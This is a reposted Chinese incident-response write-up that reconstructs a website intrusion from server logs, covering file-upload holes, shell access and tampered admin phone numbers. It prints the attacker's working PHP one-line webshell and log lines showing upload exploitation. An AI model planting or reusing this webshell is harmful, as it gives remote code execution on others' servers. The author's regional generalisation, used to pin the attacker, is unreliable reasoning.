【轉載】【解密】日誌追凶之從看日誌瞭解黑客攻擊手法
夜已深,人已睡
而我們的路,才剛剛起航。
在下給大家獻上一個鉅作,可花了我不少時間!
首先我們來認識兩個日誌。
www.xxx.com-access_log
www.xxx.com-error_log
一個是錯誤日誌,一個是普通的日誌。
首先我們接到一位客戶的客戶的求助,網站被入侵,資料被篡改,伺服器已關閉。於是開始了一波日誌追凶之路。
首先我們先把他們的網站後臺訪問記錄給清理出來(黑客一般都需要進後臺改資料)
[HTML] 純文字檢視 複製程式碼
?1資料1:[url]http://www.xxx.com/index.php?g=admin&m=index&a=index[/url]]http://www.xxx.com/index.php?g=admin&m=index&a=index網站後臺主頁
首先客戶的IP地址為:154.124.124.* 就在無其他外地IP
那麼也就是說只要是別的IP地址成功的訪問了後臺的主頁,那他就是黑客了!
我們先查的第一個日誌檔案就是 www.xxx.com-access_log這個檔案是用來儲存每個使用者訪問了那些檔案的日誌(css,js,png圖片啥的都在內)
總共36個訪問記錄
[HTML] 純文字檢視 複製程式碼
?1
2
3183.164.254.195 - - [25/Jul/2017:13:49:43 +0800] "GET /index.php?g=admin&m=index&a=index HTTP/1.1" 302 -
183.164.254.195 - - [25/Jul/2017:13:49:45 +0800] "GET /index.php?g=admin&m=public&a=login HTTP/1.1" 200 2384
183.164.254.195 - - [25/Jul/2017:13:49:46 +0800] "GET /index.php?g=api&m=checkcode&a=index&length=4&font_size=20&width=248&height=42&use_noise=1&use_curve=0 HTTP/1.1" 200 1355
突然發現了一個IP地址為:183.164.254.195(安徽省淮北市 電信 )
登陸時間:2017年7月25日 13:49:43秒 (也就是客戶發現數據被篡改的這天)
(我沒地域黑的意思,安徽這邊做黑產的實在不少,於是判定這就是黑客IP)
好傢伙,500多條請求記錄,於是我們將這個IP地址作為搜尋依據,開始摸下去。
可以看到他在瀏覽後臺,所以在請求JS等檔案,繼續跟蹤,看看還幹了什麼。
183.164.254.195 - - [25/Jul/2017:13:51:53 +0800] "GET /index.php?g=&m=admin_post&a=add&term= HTTP/1.1" 200 10760
可以看到,這名黑客在新增網站後臺管理員。
接著
183.164.254.195 - - [25/Jul/2017:13:52:00 +0800] "GET /index.php?g=Asset&m=Ueditor&a=upload&action=config&&noCache=1500961918833 HTTP/1.1" 200 2105
我們看到了他正在使用百度編輯器的檔案上傳功能,(簡單意思:正在上傳檔案)
接著繼續跟下去發現了他訪問了一個index.php檔案
183.164.254.195 - - [25/Jul/2017:13:53:37 +0800] "POST /plugins/Mobileverify/View/assets/images/index.php HTTP/1.1" 200 -
於是我們查看了伺服器該處檔案的原始碼,果然是一個一句話
<?php
error_reporting(0);
$a=array($_REQUEST['c']=>"");
$b=array('');
array_diff_uassoc($a,$b,create_function('$a','return @eval(base64_decode($a));'));
?>
這就是黑客的一句話木馬,至此之中我們還未發現他是如何獲取到的密碼。繼續往下跟
多次在訪問這個一句話木馬,推測是在使用菜刀進行一些操作
繼續跟
183.164.254.195 - - [25/Jul/2017:13:55:13 +0800] "POST /index.php?g=Asset&m=Ueditor&a=upload&action=uploadimage HTTP/1.1" 200 115
上面的這段程式碼是在使用百度編輯器的上傳功能,緊接著下面就是出現了php檔案
183.164.254.195 - - [25/Jul/2017:13:55:26 +0800] "GET //data//upload//ueditor//20170725//5976dd41ba74e.php HTTP/1.1" 200 -
183.164.254.195 - - [25/Jul/2017:13:55:27 +0800] "GET //data//upload//ueditor//20170725//5976dd41ba74e.php HTTP/1.1" 200 -
於是推測這個編輯器可能存在任意檔案上傳,那麼問題來了,他是怎麼進的後臺?
然後這名黑客一直在使用這個一句話檔案,進行一些操作,於是我猜想到了這名黑客上傳的第一個檔案index.php是準備用來作為自己再次攻進來的後門,所以並未直接使用哪個一句話,而是直接用的編輯器上傳的新的一句話木馬。
在14:07:55秒他進行了
183.164.254.195 - - [25/Jul/2017:14:07:55 +0800] "GET /index.php?g=mill&m=dealadmin&a=force HTTP/1.1" 200 15294
一個刪除管理員的操作。
(在剛進後臺的時候他就立即進行了新增管理員操作,接著他發現了後臺編輯器存在上傳漏洞,於是又回去刪除掉了剛開始新增的管理員,防止被發現。)
接著
183.164.254.195 - - [25/Jul/2017:14:10:57 +0800] "GET /index.php?g=Admin&m=Menu&a=edit&id=109&menuid= HTTP/1.1" 200 17203
對編號為109的管理員進行了修改操作
183.164.254.195 - - [25/Jul/2017:14:12:45 +0800] "GET /index.php?g=User&m=indexadmin&a=edituser&id=4131 HTTP/1.1" 200 3442
接著對會員使用者ID為4131的進行改動
183.164.254.195 - - [25/Jul/2017:14:22:14 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=21 HTTP/1.1" 200 2928
修改了管理員ID為21的手機號
(他這樣做是因為後臺登陸需要手機號,修改密碼也可以在前臺找回密碼處修改管理員密碼。)
這招確實高。
接著,又TM改了管理員編號為37的。。我日
183.164.254.195 - - [25/Jul/2017:14:29:37 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=37 HTTP/1.1" 200 2928
183.164.243.116 - - [25/Jul/2017:15:18:09 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=162 HTTP/1.1" 200 2929
183.164.243.116 - - [25/Jul/2017:17:24:25 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=4181 HTTP/1.1" 200 2919
算下來,這名黑客總共篡改了5個管理員賬戶的手機號。也tm是個人才
可見黑客對這個網站的重視程度。
最後黑客的日誌中斷於:
183.164.243.116 - - [25/Jul/2017:19:19:41 +0800]
3點進來的,5點走的。
這名黑客追蹤完畢,我繼續看後臺日誌
起來繼續寫
220.173.123.32 - - [25/Jul/2017:14:08:18 +0800] "GET /index.php?g=Admin&m=Slide&a=index HTTP/1.1" 200 5800
突然一個IP地址又出現在了我的眼前,這個IP地址在2點08分18秒進入過後臺,上一名黑客是在3進來的,那麼他們是否有某種聯絡?
隨後我對這名黑客的操作進行了分析
220.173.123.32 - - [25/Jul/2017:14:11:33 +0800] "POST /index.php?g=asset&m=asset&a=plupload HTTP/1.1" 200 304
進行上傳操作
上傳第一個圖片
220.173.123.32 - - [25/Jul/2017:14:12:12 +0800] "GET /data//upload//admin//20170725//5976e115d4414.jpg HTTP/1.1" 200 4819
然後下面這條我給大家解讀一下,他是在利用Nginx的解析漏洞
220.173.123.32 - - [25/Jul/2017:14:12:16 +0800] "GET /data//upload//admin//20170725//5976e115d4414.jpg/.php HTTP/1.1" 404 251
該名黑客對後臺進行多番操作(改資料,新增管理賬戶等,比如)
220.173.123.32 - - [25/Jul/2017:14:14:48 +0800] "GET /index.php?g=Admin&m=ad&a=add HTTP/1.1" 200 2684
接著他又再次去使用檔案上傳功能,但是這次卻突然上傳成功了
220.173.123.32 - - [25/Jul/2017:14:18:42 +0800] "GET /data/upload/admin/20170725/5976e1e4373de.php HTTP/1.1" 200 -
我懷疑是183那名黑客教他的
隨後這名黑客利用上傳好了的shell,開始進行菜刀操作,這裡就不列舉了
這名黑客在6點41分退出後臺,刪除了原先新增的賬戶
220.173.123.32 - - [25/Jul/2017:18:41:43 +0800] "POST /index.php?g=Mill&m=Dealadmin&a=deal HTTP/1.1" 200 14459
在這裡的第一個日誌過程中,我們終究未發現這夥人是如何拿到後臺密碼進入後臺的,下一個日誌即將為大家揭祕。
第二個日誌我就繼續以這兩個黑客IP為線索,開始進行下一步追蹤
我直接定位了220.173.123.32的操作記錄
然後分析是否留了後門
[Tue Jul 25 18:41:43.948532 2017] [:error] [pid 1563:tid 139622384338688] [client 220.173.123.32:21604] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com/index.php?g=admin&m=index&a=index
在這篇日誌中,這名黑客其實進行的都是一些後臺操作,毫無技術含量,也沒有留後門什麼的,看起來不像是一個技術人員,倒像是一個洗錢專家
於是我們對另外一名183的黑客進行追蹤
我們看到他對20170724.rar進行了訪問操作
[client 183.164.254.195:63171] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com/20170724.rar
但是返回404
接著對一個檔案進行了更改
[client 183.164.254.195:61753] PHP Fatal error: Can't use function return value in write context in /data/WebRoot/www.xxx.com/application/Portal/Controller/AdminPageController.class.php on line 127, referer: http://www.xxx.com/index. ... m=index&a=index
AdminPageController.class.php 我們立即對這個檔案的127行進行了檢視,發現他去掉了驗證。
首先我們知道,後臺是存在任意檔案上傳的,但是都需要登陸後臺,如果客戶方全部修改密碼,他們的原先小把戲肯定就能顯形,而這裡他進行的更改就是無需登陸,可直接通過burp進行上傳任意檔案。
這條日誌的發現,使我們徹底明白了他的入侵方式
[client 183.164.254.195:62221] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com//data//upload//ueditor//20170725//5976eaa7e9225.php
原來是前臺會員中心的頭像上傳漏洞
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
這裡對這次黑客攻擊技術性做一次評估和分析
首先這名黑客利用前臺任意檔案上傳漏洞,接著獲取到了shell,然後該名黑客解密了其中一個管理人員的密碼,登陸後臺,接著對後臺部分管理人員的繫結手機號篡改,以方便下次入侵。(確實機智,前臺可根據簡訊驗證碼修改後臺管理員密碼,但是足以可見這是一個犯罪經驗比較豐富的團伙)接著應該叫做Boss的220.173.123.32出場,開始對後臺進行金額上面的篡改,以達到洗錢的目的,然後作為技術人員的安徽黑客183.164.254.195就開始進行留後門操作,他們都是同一時間進行的操作,而且還很聰明的修改了檔案上傳功能的許可權驗證,以達到未授權訪問的目的,這樣即使防毒軟體怎麼掃描都無法掃描出來。